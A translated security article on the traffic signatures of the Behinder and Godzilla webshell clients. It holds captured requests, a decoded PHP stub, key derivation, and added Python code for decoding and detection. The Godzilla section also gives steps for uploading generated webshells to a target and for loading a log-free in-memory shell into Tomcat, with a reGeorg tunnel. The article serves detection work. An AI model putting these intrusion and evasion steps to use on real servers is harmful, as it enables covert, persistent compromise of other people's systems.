Traffic Signature Analysis of Behinder (冰蝎) 2 and 3 and Godzilla

Category: Security Articles

Behinder 2

Behinder (冰蝎) is a newer type of webshell client, developed in Java, that dynamically encrypts its communication traffic.

How Behinder communicates

Behinder's communication can be divided into two phases:

1. Key negotiation

2. Encrypted transmission

1) Phase one: key negotiation

a. PHP

The attacker requests the server-side key with a GET request:

GET /hackable/uploads/shell.php?pass=300 HTTP/1.1


Once a command is entered, the request method switches to POST:

POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=lsgi7fb09enqcn3svmti4eqbo7; path=/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.129:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 1112

hxx/2GPvW+iHRI+j7FKIjpbHv6JcLQzyNs8uQ1IPDTB2xcS5+oKiaSKujjcZ/uYLEwn6oA8a1YehtGbT9arlXe3LaA0kig9BITcK3iZZKYhjpK0/ziTfTa5CnU3lfrnmCcadnmtgUKyTZDdb93DSqwyGn3cFb7BuIPkdCu6SpLov3+EExlHPbY/+6PiiDIpWGCxzkEIwli6zJiS8fa4fSxYcr/e0viSLVI3eXHAvhcohXLsVbWV5HmZMovp4EHYkcofLdR7fjx+NZbIfBOTZfzbOTOXBRBI2GBEUZG4uzi7s0xeHzUWeKf/n+CjrCs1OgYT893Q5KyRSr9+wn3Gi8JfDYPKCady

b. JSP

First, a GET request asks the server for a random key:

GET /s.jsp?pass=987 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16
Date: Wed, 18 Nov 2020 12:32:58 GMT

9e39ae1ad6ee9e32  // key returned by the server

After a command is entered, the request method becomes POST, just as with PHP:

POST /s.jsp HTTP/1.1
Content-Type: application/octet-stream
Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 855675

Zv64K/CymLAnv5UhDhKfJdj58rU1o/0yZ7D0XlJU7MgTbzaA4zrvImnNs1Y1cmNPGAdxaaEaYxvasJSp2sCHk5TPv+fWunDMvZWoBqjcnkHGMYyohZpH1v7OvWcdAZPg7CIL87y9HPc2lydWTiBVspavD0FkRVY7/XmeWw7m/O42+SE28iQSgyLf/

2) Server-side key handling

The server takes the upper 16 characters of the MD5 of a random number as the key, stores it in the session's $_SESSION variable, and returns it to the attacker.

3) Decryption

The key obtained from the PHP key-request packet above:

95c4e8e4eef4b1ac  // key returned by the server

a. Request ciphertext

b. Feed the key and the request ciphertext into the decryptor; the decrypted result is base64-encoded

c. base64 decode

@error_reporting(0);

function main($content) {
    $result = array();
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];                       // key negotiated in phase one
    echo encrypt(json_encode($result), $key);
}

function encrypt($data, $key) {
    if (!extension_loaded('openssl')) {
        // no openssl extension: XOR each byte with the key, indexed from 1
        for ($i = 0; $i < strlen($data); $i++) {
            $data[$i] = $data[$i] ^ $key[$i + 1 & 15];
        }
        return $data;
    } else {
        return openssl_encrypt($data, "AES128", $key);
    }
}

$content = "327c829b-f4d3-41eb-a251-d561e01011ec";
main($content);

4) Summary of signatures

a. Accept header

Behinder 2's default Accept value is unusual, and it is identical in every phase:

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

b. User-Agent header

Behinder has a dozen or so built-in User-Agent strings and picks one at random for each shell connection. They are all fairly old, which makes them easy to detect, although the UA header can be modified in Burp.

c. Content-Length

Content-Length: 16 in the key response; the value 16 is a signature of a Behinder 2 connection.

Behinder 3

Compared with Behinder 2, Behinder 3 drops dynamic key retrieval: many WAFs and similar devices now match Behinder 2's traffic characteristics, so version 3 removed the key request. Only if the keyless interaction fails does it fall back to the regular key-exchange phase.

<?php
@error_reporting(0);
session_start();
$key = "e45e329feb5d925b"; // first 16 characters of the 32-character MD5 of the connection password; the default password is rebeyond
$_SESSION['k'] = $key;

As the key generation shows, the key is the first 16 characters of the MD5 of the password.
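The following is an added example, not code from the article or from the Behinder project. It reproduces in Python the two pieces of key handling shown on this page: the static key Behinder 3 derives from the connection password, and the byte-wise XOR fallback that the decoded PHP payload uses when the openssl extension is absent. An incident responder who has recovered the webshell file (and therefore its password) can use these to decode captured XOR-mode payloads offline. The function names and the sample plaintext are assumptions made for the example.

```python
import hashlib

# Added example (not the article's or Behinder's code). Function names and the
# sample data are constructed for illustration.

KEY_LEN = 16  # the shell keeps the first 16 hex characters of the MD5 digest


def derive_key(password: str) -> str:
    """First 16 characters of md5(password) in hex, as stored in $_SESSION['k']."""
    return hashlib.md5(password.encode()).hexdigest()[:KEY_LEN]


def xor_transform(data: bytes, key: str) -> bytes:
    """Mirror of the PHP fallback branch: $data[$i] ^= $key[($i + 1) & 15].

    XOR is symmetric, so one function both encodes and decodes. The key index
    starts at 1 rather than 0, exactly as in the page's PHP.
    """
    k = key.encode()
    return bytes(b ^ k[(i + 1) & 15] for i, b in enumerate(data))


def decode_captured(payload: bytes, password: str) -> bytes:
    """Decode a raw XOR-mode payload given the shell's connection password."""
    return xor_transform(payload, derive_key(password))


if __name__ == "__main__":
    key = derive_key("rebeyond")
    print(key)  # e45e329feb5d925b, the key in the page's PHP stub
    # Constructed sample plaintext of the kind the page shows after decoding
    sample = b'$content="327c829b-f4d3-41eb-a251-d561e01011ec";'
    blob = xor_transform(sample, key)
    print(decode_captured(blob, "rebeyond") == sample)
```

The AES branch (openssl_encrypt with "AES128") is not reproduced here; for captures from a shell with openssl available, the same derived key is the input to an AES-128 decryption instead of this XOR loop.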

Signature analysis

PHP packet capture

Inspecting the packet reveals no obvious signature, beyond the fact that it is a POST request.

1) The Accept header contains application/xhtml+xml, application/xml and application/signed-exchange; this is a weak signature.

2) The User-Agent header is also a weak signature. It can be changed in Burp, but the 16 default User-Agents built into Behinder 3.0 are all fairly old and rarely seen in real-world traffic, so they can still serve as a WAF rule feature.

POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: text/html;charset=utf-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:777
Connection: keep-alive
Content-Length: 1432
Cookie: PHPSESSID=peimnpkc4hi70akr2seroj6mi2

3Mn1yNMtoZViV5wotQHPJtwwj0F4b2lyToNK7LfdUnN7zmyQFfx/zaiGwUHg+8SlXZemCLBkDIvxiBIGd6bgOEiZtNpn6YmnWiiaCBNbXkC5JWFTARrD8lCOCQ4ZVFjsJFDaAOwzinbqne/oYuNwWjQvKM9ii2RE/b+Gc+ya2f4+OIDU2Wk/QSIL7GOAoyaUYZSq4bL2wmX5RnP1Lbf7S+TAy3K7JPruBiZeZGC/ay14vUj4+IgmNHwEAzWl3DNIsL1yhH4Do5FI8HwZpG5XnrZwpKdFIEgN4GKmcDODTdO2pj8DVXCwes3m+v/wRykVd++xsex2EkGn9p0SgL+GpXlGg6Ol

JSP packet capture

Signature analysis: Content-Type: application/octet-stream is a strong signature. Looking it up, octet-stream means the request submits binary data only, and a single binary object at that; if a file is submitted, only one file can be sent, and the back end can receive only one parameter, which must be a stream (or byte array). It is rarely used in ordinary traffic.

POST /3.jsp HTTP/1.1
Content-Type: application/octet-stream
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Cache-Control: no-cache
Pragma: no-cache
Host: x.x.x.x:888
Connection: keep-alive
Content-Length: 11864
Cookie: JSESSIONID=F063F33F5F8BE2F3C75311C7128E70D1

F1w4ahdSJGUxG3t11sfr6qxbThq9VnL7i6K1/NzHsb0s9eQIfj2qDW/r5OeNJjI0U/BrUp2pHtrtCkdiUeJVIKFzCMSfe8yhEddJFJideje6Eb0dtrHHd9YYaZcxqQL2FFusmCXFICrCh3MsG+BYZHKbNVkWJrsTiu/1VBPV9CBkJzPBO4aH98EBFycyQbpGCHjAPaZmbaIIVWenbm642/xYr85uQ5/K74vlQ9wR5iGLZvyH8WZOF0YpqhxjkApKeShoSGX/C87NiqMTVAB+DcFNf4HaitS1o7Q6kXnUET00L5irn+WdNis2mvNEzr+DGay6LSKKD9kDl6iTKD/1aiXfk5EgH4PfR0/aXCEKTsFW29So6wbhR6u4H3/
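The following is an added example, not code from the article or from any of the tools it discusses. It turns the Behinder 2 signatures summarised earlier (the fixed Accept value, the dated User-Agent strings, the GET key request with a pass parameter, and the 16-byte hex key response) and the Behinder 3 signatures above (the application/signed-exchange Accept value and the application/octet-stream POST) into a small scorer over raw HTTP text such as a proxy capture. The header values come from the page's captures; the point weights, the UA marker list and the sample messages are constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

# Added example (not the article's or Behinder's code). Weights, the old-UA
# marker list and the sample captures are constructed; header values come from
# the page. Messages are expected as raw HTTP text with CRLF line endings.

BEHINDER2_ACCEPT = "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"
SIGNED_EXCHANGE = "application/signed-exchange"
# Fragments of the dated browser strings seen in the page's captures. Assumption:
# a production rule would carry the full list the client ships with.
OLD_UA_MARKERS = ("Chrome/14.", "Maxthon/3.0", "Windows; U;")


def parse_http(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split one HTTP message into (start line, lower-cased header map, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def score_request(raw: str) -> Tuple[int, List[str]]:
    """Return (score, names of matched signals) for a client request."""
    start, h, body = parse_http(raw)
    accept, ua = h.get("accept", ""), h.get("user-agent", "")
    ctype = h.get("content-type", "")
    is_get, is_post = start.startswith("GET "), start.startswith("POST ")
    checks = [
        (accept == BEHINDER2_ACCEPT, 3, "behinder2_accept"),           # strong, Behinder 2
        (SIGNED_EXCHANGE in accept, 1, "signed_exchange_accept"),      # weak, Behinder 3
        (any(m in ua for m in OLD_UA_MARKERS), 1, "old_user_agent"),   # weak, both
        (is_get and re.search(r"\?pass=\d+", start) is not None, 2, "get_pass_key_request"),
        (is_post and ctype == "application/octet-stream", 3, "octet_stream_post"),  # strong, Behinder 3 JSP
        (is_post and re.fullmatch(r"[A-Za-z0-9+/=]+", body) is not None, 1, "base64_only_body"),
    ]
    reasons = [label for ok, _, label in checks if ok]
    score = sum(pts for ok, pts, _ in checks if ok)
    return score, reasons


def score_key_response(raw: str) -> Tuple[int, List[str]]:
    """Behinder 2 key handout: Content-Length 16 with a body of 16 hex characters."""
    _, h, body = parse_http(raw)
    if h.get("content-length") == "16" and re.fullmatch(r"[0-9a-f]{16}", body):
        return 3, ["hex16_key_response"]
    return 0, []


# Constructed sample messages modelled on the page's captures (bodies shortened)
KEY_REQUEST = (
    "GET /s.jsp?pass=987 HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12\r\n"
    "Host: 192.168.0.132:555\r\n"
    "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n"
    "Connection: keep-alive\r\n\r\n"
)
KEY_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\n"
    "Content-Type: text/html;charset=ISO-8859-1\r\nContent-Length: 16\r\n\r\n"
    "9e39ae1ad6ee9e32"
)
B3_JSP_POST = (
    "POST /3.jsp HTTP/1.1\r\nContent-Type: application/octet-stream\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\n"
    "Host: x.x.x.x:888\r\nContent-Length: 20\r\n\r\nF1w4ahdSJGUxG3t11sfr"
)
BENIGN_GET = (
    "GET /index.html HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0\r\n"
    "Accept: text/html,*/*;q=0.8\r\n\r\n"
)

if __name__ == "__main__":
    for name, msg in [("key request", KEY_REQUEST), ("behinder3 jsp", B3_JSP_POST), ("benign", BENIGN_GET)]:
        print(name, score_request(msg))
    print("key response", score_key_response(KEY_RESPONSE))
```

The two Behinder 2 checks that carry the most weight (the exact Accept value and the 16-byte hex key response) are the ones the page calls out as distinctive; the Behinder 3 signals are scored lower individually because, as the page notes, the Accept and User-Agent values are only weak features, and the octet-stream POST is the one strong one.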

Godzilla signature analysis

Introduction

Godzilla is a webshell management tool with fully encrypted HTTP traffic. Compared with AntSword (蚁剑) and Behinder, Godzilla has the following advantages:

All shell types evade every static scanner on the market

Traffic encryption evades every traffic WAF on the market

Godzilla's bundled plugins go beyond anything Behinder or AntSword offer

Usage

(1) Godzilla requires a Java runtime. In cmd, change to the directory containing Godzilla and run:

java -jar Godzilla.jar

A data.db database is then created in the same directory to store its data.

(2) Godzilla's webshell can be generated with custom options: Manage > Generate the required webshell. Godzilla supports jsp, php, aspx and other payloads; the Java and C# payloads implement AES encryption natively.

The PHP payloads use XOR encryption.

(3) Upload the generated webshell to the target machine, then add the corresponding URL in Godzilla's target panel.

PHP connection signatures

(1)php_XOR_BASE64

Set up a proxy and capture with Burp. Every captured request contains "pass=". First packet:

POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23275
Connection: close

pass=KX4nWAFVJ005aWdeUVosCjpuL0k7YApWKGVGfHFTUXg5WDNFOwszSQEDAVVRWjdGKHU3RwBgLEkGRgV5e3cgVCpxP0YBVVBRB3d3WlFZJ0c5bjdcAVEGUgB2BEh%2BXQJeMGMdQAMKN2MBAmALeE1UWjpuK1wsUjN%2FAVx7RGhzNFwpBFRcBn9YTylIXkJ9Q1F4J2cKVyt7IF4CZmxVeXczVTYGM2Q3CA1pN11GW2taDUQ6bitKOgpYTjlmAFRrWSdJOWE3QAFRK10zZQQCUVo3XyhuFn4hUSBeKnJ0VXt3IFQycS8FAX8nQwAADERRczdGOwQvWAEKN1ICaXxdeWASfSBfJFcreyMAJ2BafHFdIFQqdSdJOGAzCABcAVVrWSdJOWI8ADBvVFMBA2deeXM3ATphHXcGb1RTKHJeQn1DUXgFZ1V7JmkRVAdmAFhWcw1FAV8nWQdgI1EAAntUUAcjXwFaXFk7YC9VOXZZS3l3DQQnZwpXK3sgXgJmbF17YSNeAmEdXDoKNw0CaXsCUU0GXTpYCUc7YC9DOwMMRWhjVFU6WyNKOG8zSQBYVkJ5bBJ9IF8kVyt7IF4qcnRVY3NQQTlxCUkpewVQBml3WlE

Second packet:

POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close

pass=AWEzAAN%2FWFI3XHNGaGBQWDEHPwY4fSQAM2AIDw%3D%3D

(2)php_XOR_RAW

Running the ls and cat commands: although the commands differ, both requests contain the same byte sequence:

:•T[6•L9e

Packet for the ls command:

POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 56
Connection: close

:•T[6•L9e•[aqP•)[T••O9t

Packet for the cat command:

POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close

:•T[6•L9e•h•_8D0c+r•}•L6[gYccY)[T••O9t

It would be a big mistake to take this as the signature: it is only the pattern shared within this one connection.

JSP connection signatures

(1)java_AES_BASE64

POST /gejs.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 33035
Connection: close

pass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0KhArobwwHBDld91Y8xrUqPxo40dKoSbGd%2FxDF4yJopsUIHMI8NMfFUl0oxBzWPyMdTmxAntagmMGLGiqB1ckbl5G%2FlapnewWrvhhdqtj0eT2zvUes%2Bg6yhFGVjLstoOdJxkYPY6XB70AeffugDlCkUYAyHyrTymPocUs14sKD5ItAn5147goo9TAdBH0kgSNlxbqxMqTPbgjKljsvC53fFB%2BO5jKUBCBvsCR1W%2FLhPA42qp1e%2Fl0cmUohwSAT3N0s9r%2FzRVlB3lQkXnV895dz48DyPbYjJp%2Bhpf1qFjbCy1o8Zd771ObGbKvWr1O5PZOTNKBu

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=509B4522D1A54112AA93CCAE0311FEFD; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:04:32 GMT
Connection: close

Like the PHP requests, these contain "pass=", and when the connection is first established the server's response has Content-Length 0.

(2)java_AES_RAW

POST /rwj.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23360
Connection: close

Óó•Á°Oêû•Ñl•ÎÓ•ô:Ô=Àôg•t*•+¡¼0••åwÝXó•Ô¨ühãGJ¡&ÆwüC•••¢••s•ðÓ••It£•sXü•u9±•{Z•c•,hª•W$n^FþV©•ì•®øav«cÑäöÎõ•³è:Ê

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C26762D96A561D4A63BDE104E22930C; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:19:56 GMT
Connection: close
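The following is an added example, not code from the article or from the Godzilla project. It takes the Godzilla traits shown in both the PHP and the JSP captures above (the Java/1.8.0_131 User-Agent, the body beginning with "pass=", the Content-Length 0 response at connection setup, and, in the RAW modes, an identical opaque byte sequence at the start of every request body to the same shell) and checks them per URL over a batch of already-parsed requests. It deliberately treats the shared prefix as a per-connection property, since the page warns it is not a fixed signature. The record layout, the prefix-length threshold, the opaque-bytes rule and the sample records are assumptions constructed for the example.

```python
from collections import defaultdict
from typing import Dict, Iterable, List

# Added example (not the article's or Godzilla's code). Input records are
# assumed to be already parsed: url, user_agent, body (bytes) and
# response_content_length (int or None). Thresholds and samples are constructed.

JAVA_UA_PREFIX = "Java/"
MIN_SHARED_PREFIX = 8  # assumption: shorter shared prefixes are too common in ordinary forms


def common_prefix(blobs: List[bytes]) -> bytes:
    """Longest byte prefix shared by all blobs (empty when fewer than two)."""
    if len(blobs) < 2:
        return b""
    shortest = min(blobs, key=len)
    for i in range(len(shortest)):
        if any(b[i] != shortest[i] for b in blobs):
            return shortest[:i]
    return shortest


def is_opaque(data: bytes) -> bool:
    """True when the bytes are not all printable ASCII, i.e. unlike a normal form field."""
    return any(c < 0x20 or c > 0x7E for c in data)


def assess_godzilla(records: Iterable[Dict]) -> Dict[str, Dict]:
    """Group requests by URL and report which Godzilla traits hold for each group."""
    by_url: Dict[str, List[Dict]] = defaultdict(list)
    for r in records:
        by_url[r["url"]].append(r)
    report: Dict[str, Dict] = {}
    for url, reqs in by_url.items():
        prefix = common_prefix([r["body"] for r in reqs])
        findings = {
            "java_user_agent": all(r["user_agent"].startswith(JAVA_UA_PREFIX) for r in reqs),
            "pass_param": all(r["body"].startswith(b"pass=") for r in reqs),
            # RAW modes: same opaque leading bytes on every request in this connection
            "shared_opaque_prefix": len(prefix) >= MIN_SHARED_PREFIX and is_opaque(prefix),
            # first response of the connection carried no body (Content-Length: 0)
            "empty_first_response": reqs[0].get("response_content_length") == 0,
        }
        findings["score"] = sum(1 for v in findings.values() if v is True)
        report[url] = findings
    return report


# Constructed stand-in for the repeated leading bytes the page shows for g.php
RAW_PREFIX = b":\x95T[6\x8eL9e\x95"
JAVA_UA = "Java/1.8.0_131"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
SAMPLE_RECORDS = [
    {"url": "/hackable/uploads/g.php", "user_agent": JAVA_UA,
     "body": RAW_PREFIX + b"[aqP\x80)[T\x81\x82O9t", "response_content_length": None},
    {"url": "/hackable/uploads/g.php", "user_agent": JAVA_UA,
     "body": RAW_PREFIX + b"h\x8f_8D0c+r\x90}\x91L6[gYccY)[T\x81\x82O9t", "response_content_length": None},
    {"url": "/gejs.jsp", "user_agent": JAVA_UA,
     "body": b"pass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0", "response_content_length": 0},
    {"url": "/app/search", "user_agent": BROWSER_UA, "body": b"q=alpha", "response_content_length": 2048},
    {"url": "/app/search", "user_agent": BROWSER_UA, "body": b"q=beta", "response_content_length": 1931},
]

if __name__ == "__main__":
    for url, findings in assess_godzilla(SAMPLE_RECORDS).items():
        print(url, findings)
```

The Java User-Agent is the default the client sends and, like Behinder's UA list, can be edited away; combining it with the body and response traits per URL is what makes the result useful, and the shared-prefix check is only meaningful within one captured session.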

In-memory shell

The memory shell module can load a Godzilla shell, or a Behinder or China Chopper (菜刀) shell, into Tomcat, and can even upload reGeorg to build an HTTP tunnel.

Here I chose to upload a Behinder shell.

Then connect with Behinder; the connection succeeds.


A memory shell leaves no log and disappears after Tomcat restarts.


This article was first published on the WeChat public account FreeBuf: 冰蝎2和3及哥斯拉Godzilla特征分析
